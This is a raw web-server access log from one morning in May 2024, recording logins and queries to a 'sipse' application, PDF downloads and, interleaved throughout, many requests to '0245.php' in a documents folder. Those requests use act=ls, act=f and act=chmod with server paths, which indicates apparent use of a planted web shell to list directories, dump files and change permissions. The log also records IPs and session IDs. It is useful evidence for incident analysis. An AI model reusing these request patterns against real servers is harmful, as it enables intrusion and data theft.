181.53.12.168 - - [09/May/2024:06:52:37 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12400
47.128.63.129 - - [09/May/2024:06:52:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=tw-sack.js HTTP/1.1" 200 3009
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:38 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
47.128.63.129 - - [09/May/2024:06:52:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.63.129 - - [09/May/2024:06:52:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.63.129 - - [09/May/2024:06:52:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.63.129 - - [09/May/2024:06:52:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.63.129 - - [09/May/2024:06:52:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_js HTTP/1.1" 200 131
47.128.63.129 - - [09/May/2024:06:52:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.63.129 - - [09/May/2024:06:52:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.63.129 - - [09/May/2024:06:52:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.63.129 - - [09/May/2024:06:52:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.63.129 - - [09/May/2024:06:52:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
181.53.12.168 - - [09/May/2024:06:52:41 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2216
181.53.12.168 - - [09/May/2024:06:52:41 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16350
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:43 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.12.168 - - [09/May/2024:06:52:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:46 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
216.244.66.195 - - [09/May/2024:06:52:48 -0500] "GET /BLA/resoluciones/AUTOS%202019/3834.pdf HTTP/1.1" 200 224740
181.53.12.168 - - [09/May/2024:06:52:48 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 38981
181.53.12.168 - - [09/May/2024:06:52:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:52:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12990
47.128.40.148 - - [09/May/2024:06:52:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5CText%5C HTTP/1.1" 200 2888
201.245.192.253 - - [09/May/2024:06:53:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.12.168 - - [09/May/2024:06:53:13 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12934
216.244.66.195 - - [09/May/2024:06:53:14 -0500] "GET /BLA/resoluciones/AUTOS%202020/4934.pdf HTTP/1.1" 200 530929
47.128.30.7 - - [09/May/2024:06:53:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cgoldodo&sort=2a HTTP/1.1" 200 3738
47.128.30.7 - - [09/May/2024:06:53:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.30.7 - - [09/May/2024:06:53:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
181.53.12.168 - - [09/May/2024:06:53:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12807
181.53.12.168 - - [09/May/2024:06:53:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12807
181.53.12.168 - - [09/May/2024:06:53:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12845
181.53.12.168 - - [09/May/2024:06:53:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12806
47.128.62.88 - - [09/May/2024:06:53:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=1&d=E%3A%5Cxampp%5Cxampp%5Cwebalizer%5C&f=daily_usage_201203.png HTTP/1.1" 200 14994
47.128.62.88 - - [09/May/2024:06:53:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.62.88 - - [09/May/2024:06:53:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.62.88 - - [09/May/2024:06:53:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.62.88 - - [09/May/2024:06:53:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_png HTTP/1.1" 200 175
47.128.62.88 - - [09/May/2024:06:53:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.62.88 - - [09/May/2024:06:53:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.62.88 - - [09/May/2024:06:53:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.62.88 - - [09/May/2024:06:53:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.62.88 - - [09/May/2024:06:53:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.62.88 - - [09/May/2024:06:53:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
216.244.66.195 - - [09/May/2024:06:53:40 -0500] "GET /BLA/resoluciones/AUTOS%202020/4946.pdf HTTP/1.1" 200 441424
181.53.12.168 - - [09/May/2024:06:53:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12796
181.53.12.168 - - [09/May/2024:06:53:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12868
47.128.30.85 - - [09/May/2024:06:53:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Clicenses%5Cxdebug%5C&sort=0d HTTP/1.1" 200 3375
47.128.30.85 - - [09/May/2024:06:53:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.30.85 - - [09/May/2024:06:53:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
201.245.192.253 - - [09/May/2024:06:54:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61a2f1337561a42fa9f7ee58a022b14f9.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [09/May/2024:06:54:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [09/May/2024:06:54:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0236.pdf HTTP/1.1" 200 599719
181.53.12.168 - - [09/May/2024:06:54:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12825
47.128.24.72 - - [09/May/2024:06:54:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5435.pdf&ft=info HTTP/1.1" 200 3841
47.128.24.72 - - [09/May/2024:06:54:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.24.72 - - [09/May/2024:06:54:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.24.72 - - [09/May/2024:06:54:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.24.72 - - [09/May/2024:06:54:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.24.72 - - [09/May/2024:06:54:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.24.72 - - [09/May/2024:06:54:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.24.72 - - [09/May/2024:06:54:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.24.72 - - [09/May/2024:06:54:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.24.72 - - [09/May/2024:06:54:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.24.72 - - [09/May/2024:06:54:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
181.53.12.168 - - [09/May/2024:06:54:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 9853
181.53.12.168 - - [09/May/2024:06:54:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12849
201.245.192.253 - - [09/May/2024:06:54:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69b4b1609f19d4e7eb2d2d1c5b0af5253.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [09/May/2024:06:54:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/5617.pdf HTTP/1.1" 200 367447
47.128.57.131 - - [09/May/2024:06:54:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.57.131 - - [09/May/2024:06:54:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.57.131 - - [09/May/2024:06:54:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.57.131 - - [09/May/2024:06:54:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.57.131 - - [09/May/2024:06:54:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.57.131 - - [09/May/2024:06:54:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=4&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5Cincludes%5C&f=upgrade.php HTTP/1.1" 200 35463
47.128.57.131 - - [09/May/2024:06:54:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.57.131 - - [09/May/2024:06:54:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.57.131 - - [09/May/2024:06:54:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.57.131 - - [09/May/2024:06:54:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.57.131 - - [09/May/2024:06:54:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
181.53.12.168 - - [09/May/2024:06:54:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12817
181.53.12.168 - - [09/May/2024:06:54:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12825
181.53.12.168 - - [09/May/2024:06:54:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12870
47.128.61.241 - - [09/May/2024:06:54:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5CSimplePie%5C&f=Restriction.php&fullhexdump=1 HTTP/1.1" 200 5008
47.128.61.241 - - [09/May/2024:06:54:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.61.241 - - [09/May/2024:06:54:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.61.241 - - [09/May/2024:06:54:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.61.241 - - [09/May/2024:06:54:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.61.241 - - [09/May/2024:06:54:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.61.241 - - [09/May/2024:06:54:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.61.241 - - [09/May/2024:06:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.61.241 - - [09/May/2024:06:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.61.241 - - [09/May/2024:06:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.61.241 - - [09/May/2024:06:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
201.245.192.253 - - [09/May/2024:06:55:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.53.12.168 - - [09/May/2024:06:55:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12795
216.244.66.195 - - [09/May/2024:06:54:54 -0500] "GET /BLA/resoluciones/AUTOS%202022/1885.pdf HTTP/1.1" 200 1321499
172.22.2.4 - - [09/May/2024:06:53:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.37.52 - - [09/May/2024:06:55:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.37.52 - - [09/May/2024:06:55:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.37.52 - - [09/May/2024:06:55:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.37.52 - - [09/May/2024:06:55:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.37.52 - - [09/May/2024:06:55:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page82_thumbnail.jpg HTTP/1.1" 200 16211
47.128.37.52 - - [09/May/2024:06:55:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
181.53.12.168 - - [09/May/2024:06:55:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12789
47.128.37.52 - - [09/May/2024:06:55:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.37.52 - - [09/May/2024:06:55:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.37.52 - - [09/May/2024:06:55:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.37.52 - - [09/May/2024:06:55:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.37.52 - - [09/May/2024:06:55:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
172.22.2.4 - - [09/May/2024:06:55:15 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
190.253.171.207 - - [09/May/2024:06:55:28 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
201.245.192.253 - - [09/May/2024:06:55:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 31338
47.128.56.92 - - [09/May/2024:06:55:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=mediaelement-and-player.min.js&white=1 HTTP/1.1" 200 2757
190.253.171.207 - - [09/May/2024:06:55:36 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
181.53.12.168 - - [09/May/2024:06:55:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12894
190.253.171.207 - - [09/May/2024:06:55:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1587.pdf HTTP/1.1" 200 583409
216.244.66.195 - - [09/May/2024:06:55:42 -0500] "GET /BLA/resoluciones/AUTOS%202022/2015.pdf HTTP/1.1" 200 669983
47.128.34.159 - - [09/May/2024:06:55:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages%5C&f=page95_thumbnail.jpg&white=1 HTTP/1.1" 200 6671
201.245.192.253 - - [09/May/2024:06:56:02 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61a2f1337561a42fa9f7ee58a022b14f9.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [09/May/2024:06:54:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [09/May/2024:06:56:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.39.189 - - [09/May/2024:06:56:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages%5C&f=page5_thumbnail.jpg&white=1 HTTP/1.1" 200 4179
216.244.66.195 - - [09/May/2024:06:56:21 -0500] "GET /BLA/resoluciones/AUTOS%202022/2802.pdf HTTP/1.1" 200 772763
181.53.12.168 - - [09/May/2024:06:56:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 3854
201.245.192.253 - - [09/May/2024:06:56:28 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69b4b1609f19d4e7eb2d2d1c5b0af5253.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
181.53.12.168 - - [09/May/2024:06:56:27 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 66789
181.53.12.168 - - [09/May/2024:06:56:30 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:56:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:56:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:56:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:56:30 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:56:30 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:56:30 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.12.168 - - [09/May/2024:06:56:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 60165
47.128.55.94 - - [09/May/2024:06:56:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.55.94 - - [09/May/2024:06:56:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.55.94 - - [09/May/2024:06:56:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.55.94 - - [09/May/2024:06:56:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.55.94 - - [09/May/2024:06:56:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.55.94 - - [09/May/2024:06:56:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.55.94 - - [09/May/2024:06:56:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.55.94 - - [09/May/2024:06:56:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.55.94 - - [09/May/2024:06:56:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.55.94 - - [09/May/2024:06:56:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
181.53.12.168 - - [09/May/2024:06:56:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1548
216.245.221.92 - - [09/May/2024:06:56:35 -0500] "HEAD / HTTP/1.1" 200 -
181.53.12.168 - - [09/May/2024:06:56:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
